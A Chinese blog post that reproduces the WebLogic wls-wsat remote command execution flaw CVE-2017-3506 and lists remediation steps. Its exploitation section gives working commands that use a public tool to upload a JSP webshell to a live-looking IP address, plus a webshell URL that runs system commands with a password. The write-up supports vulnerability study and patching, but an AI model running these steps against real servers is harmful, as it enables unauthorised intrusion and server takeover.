weblogic wls-wsat组件远程命令执行(CVE-2017-3506)

最新推荐文章于 2024-08-12 10:54:33 发布
最新推荐文章于 2024-08-12 10:54:33 发布
阅读量8.1k 收藏 9
点赞数 4
分类专栏: 漏洞复现 文章标签: jar java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/YouthBelief/article/details/121090668
版权

所有文章,仅供安全研究与学习之用,后果自负!

weblogic wls-wsat组件远程命令执行(CVE-2017-3506)

前言

weblogic 反序列化(CVE-2017-10271)类似

一般情况下weblogic会开放7001以及7002端口

0x01 漏洞描述

wls-wsat组件远程命令执行

如果访问/wls-wsat/CoordinatorPortType11目录,存在下图则说明或许存在漏洞
/wls-wsat/CoordinatorPortType
/wls-wsat/CoordinatorPortType11

在这里插入图片描述

0x02 影响范围

OracleWebLogic Server10.3.6.0.0

OracleWebLogic Server12.1.3.0.0

OracleWebLogic Server12.2.1.1.0

OracleWebLogic Server12.2.1.2.0

0x03 漏洞利用

工具:

cve-2017-3506_webshell.jar

(1)查看使用方法
java -jar cve-2017-3506_webshell.jar

在这里插入图片描述
(2)单个url检查
显示漏洞存在
java -jar cve-2017-3506_webshell.jar -u http://118.193.36.37:57661
在这里插入图片描述
(3)上传木马

payload

端口后边有个空格 
java -jar cve-2017-3506_webshell.jar  -s http://118.193.36.37:57661 /wls-wsat/CoordinatorPortType11 shell1.jsp

在这里插入图片描述
(4)执行命令
payload:

http://118.193.36.37:57661/wls-wsat/shell1.jsp?password=secfree&command=whoami

在这里插入图片描述
在这里插入图片描述

cve-2017-3506_poc.py 检测是否存在

python2运行
(1) 运行查看使用方法
在这里插入图片描述
(2)检测是否存在漏洞

python2 cve-2017-3506_poc.py http://118.193.36.37:35509/

在这里插入图片描述

  • 显示存在漏洞

0x04 漏洞修复

1.删除war包
根据实际 环境 路径和业务需求,删除WebLogic程序下列war包及目录
rm -f/home/WebLogic/Oracle/Middleware/wlserver_10.3/server/lib/wls-wsat.war
rm -f/home/WebLogic/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/.internal/wls-wsat.war
rm -rf/home/WebLogic/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/wls-wsat
2.设置网络访问控制
配置 http://ip_address:7001/wls-wsat 网络访问控制策略,禁止外网可以直接访问。
3.更新补丁和扫描:
更新Oracle官方发布相关补丁,下载链接: http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html 。
3.检测和防御
阿里云态势感知已增加检测规则,支持入侵行为和漏洞检测,建议您开通态势感知(专业版以上版本)进行检测。

LuckyCharm~
关注
专栏目录
CVE-2017-10271漏洞复现(Weblogic < 10.3.6 ‘wls-wsat‘ XMLDecoder 反序列化漏洞)
千寻的博客
09-14 960
文章目录影响版本漏洞详情环境搭建漏洞检测漏洞复现反弹shell弹出计算器写入shell进行利用摘抄 影响版本 Oracle WebLogic Server 10.3.6.0.0版本 Oracle WebLogic Server 12.1.3.0.0版本 Oracle WebLogic Server 12.2.1.1.0版 漏洞详情 Oracle Fusion Middleware中的Oracle WebLogic Server组件WLS Security子组件存在安全漏洞。 使用精心构造的xml数据可
weblogic漏洞分析之CVE-2017-10271
洋洋的小黑屋
08-17 1574
weblogic漏洞分析之CVE-2017-10271 一、环境搭建 1)配置docker 这里使用vulhub的环境:CVE-2017-10271 编辑docker-compose.yml文件,加入8453端口 version: '2' services: weblogic: image: vulhub/weblogic:10.3.6.0-2017 ports: - "7001:7001" - "8453:8453" 启动docker docker-compose
Weblogic反序列化远程代码执行漏洞(CVE-2018-2893)以及安装步骤
11-23
Weblogic反序列化远程代码执行漏洞(CVE-2018-2893)以及安装步骤
Weblogic漏洞(CVE-2017-3506
qq_68186313的博客
08-06 276
Veblogic的WLS Security组件对外提供了webserver服务,其中使用了XMLDecoder:来解析用户输入的XML数据,在解析过程中出现反序列化漏洞,可导致任意命令执行。1、验证是否存在wls-wsat组件。4、使用哥斯拉连接回显的地址。2、使用漏洞利用工具检测。
【精选】WebLogic-CVE-2017-3506
人若无名,便可专心练剑
12-06 439
记得要在WebLogic-XMLDecoder.jar文件中的目录下进行执行,要不然会报错。用123替换下burp里面的内容,然后进行测试下。先进行检测下漏洞是否存在。
Oracle WebLogic Server WebLogic WLS组件远程命令执行漏洞 CVE-2017-10271
qq_42430287的博客
12-22 1356
2017年8月30日,厂商Redhat发布了一个JBOSSAS 5.x 的反序列化远程代码执行漏洞通告。该漏洞位于JBoss的HttpInvoker组件中的 ReadOnlyAccessFilter 过滤器中,其doFilter方法在没有进行任何安全检查和限制的情况下尝试将来自客户端的序列化数据流进行反序列化,导致攻击者可以通过精心设计的序列化数据来执行任意代码。但近期有安全研究者发现JBOSSAS 6.x也受该漏洞影响,攻击者利用该漏洞无需用户验证在系统上执行任意命令,获得服务器的控制权。在 Red Ha
cve-2017-3506&cve-2017-10271简析
一个安全研究员
05-27 8010
如题
CVE-2017-3506 Weblogic 远程代码执行
weixin_53639243的博客
01-29 403
CVE-2017-3506 Weblogic 远程代码执行
Weblogic WLS组件REC漏洞(CVE-2017-10271)利用脚本
09-30
Weblogic wls-wsat组件反序列化漏洞(CVE-2017-10271)利用脚本。 命令执行并回显 直接上传shell 在linux下weblogic 10.3.6.0测试OK 使用方法及参数 python weblogic_wls_wsat_exp.py -t 172.16.80.131:7001 usage: ...
Weblogic < 10.3.6 ‘wls-wsat‘ XMLDecoder 反序列化漏洞(CVE-2017-10271)
s1056481432的博客
08-04 395
漏洞介绍 WeblogicWLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。 漏洞环境 通过vulhub进行搭建,找到我们要复现的漏洞的文件夹 docker-compose up -d 如图就搭建好了 漏洞复现 方法一: 1.直接发送如下数据包(注意其中反弹shell的语句,需要进行编码,否则解析XML的时候将出现格式错误) POST /wls-wsat/CoordinatorP
vulfocus[weblogic反序列化]
qq_44122254的博客
02-18 3770
名称: vulfocus/weblogic-cve_2017_10271:latest 描述: Oracle Fusion Middleware(Oracle融合中间件)是美国甲骨文(Oracle)公司的一套面向企业和云环境的业务创新平台。该平台提供了中间件、软件集合等功能。Oracle WebLogic Server是其中的一个适用于云环境和传统环境的应用服务器组件WeblogicWLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,
WebLogic WLS远程执行漏洞(CVE-2017-10271)验证
12-18
一段小代码,WebLogic WLS远程执行漏洞(CVE-2017-10271)验证。
关于禁用weblogic wls-wsat组件的步骤说明
09-03
WebLogic WLS组件漏洞,文档描述如何通过禁用组件的方式来修补漏洞
Weblogic 远程代码执行CVE-2018-2893)
最新发布
qq_23003811的博客
08-12 273
WebLogic Server使用T3协议在WebLogic Server和客户端间传输数据和通信,由于WebLogic的T3协议和Web协议使用相同的端口,导致在默认情况下,WebLogic Server T3协议通信和Web端具有相同的访问权限。易受攻击的WebLogic服务允许未经身份验证的攻击者通过T3网络访问及破坏Oracle WebLogic Server。1、修改“cmd: ls /tmp”达到任意命令执行
WebLogic Server 远程代码执行漏洞复现 (CVE-2023-21839)
qq_50854662的博客
02-28 1294
WebLogic Server 远程代码执行漏洞复现 (CVE-2023-21839)
【高危】WebLogic Server 远程代码执行漏洞复现及攻击拦截 (CVE-2023-21839)
xsharkrasp的博客
05-18 609
近日,Oracle WebLogic Server被检测到远程代码执行漏洞(CVE-2023-21839),该漏洞允许未经身份验证的远程攻击者通过T3/IIOP协议网络访问并破坏WebLogic服务器,成功利用此漏洞可导致关键数据的未授权访问或直接获取WebLogic服务器权限。当远程对象继承自OpaqueReference时,客户端在对该对象进行JNDI查找并获取的时候,服务器端实际上是通过调用远程对象的getReferent()方法来获取该对象的实际引用。发起攻击请求:新建/tmp/1.txt文件。
【Vulhub】CVE-2017-3506 Weblogic 远程代码执行
weixin_61899124的博客
07-07 416
docker-compose ps 拼接路径访问抓包修改请求包访问冰蝎连接。
Weblogic远程代码执行漏洞(CVE-2023-21839)复现/保姆级讲解
BGiscool的博客
02-28 4606
由于WeblogicIIOP/T3协议存在缺陷,当IIOP/T3协议开启时,未经身份验证的攻击者通过IIOP/T3协议向受影响的服务器发送恶意的请求,最终导致在目标服务器上访问敏感信息并执行任意代码。
以下Weblogic漏洞为反序列化的有 (2分) A CVE-2017-10271 B CVE-2018-2628 C CVE-2014-4210 D CVE-2017-3506
06-08
以下Weblogic漏洞为反序列化的有A CVE-2017-10271、B CVE-2018-2628和D CVE-2017-3506WebLogic Server是一款流行的Java应用服务器,由Oracle公司开发和维护。WebLogic Server的反序列化漏洞是一种常见的安全漏洞,攻击者可以通过构造恶意序列化数据,从而实现远程代码执行、绕过身份验证等攻击。 以下是反序列化漏洞的相关信息: A. CVE-2017-10271:WebLogic Server WLS-WSAT组件反序列化漏洞,攻击者可以通过构造特定的HTTP请求,实现远程代码执行。 B. CVE-2018-2628:WebLogic Server T3协议反序列化漏洞,攻击者可以通过构造特定的T3协议请求,实现远程代码执行。 C. CVE-2014-4210:WebLogic Server SSRF漏洞,攻击者可以通过构造恶意请求,访问内部网络资源。 D. CVE-2017-3506WebLogic Server WLS Security组件反序列化漏洞,攻击者可以通过构造特定的HTTP请求,实现绕过身份验证。 因此,选项A、B和D是反序列化漏洞。 答案:A、B、D。
评论 17
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值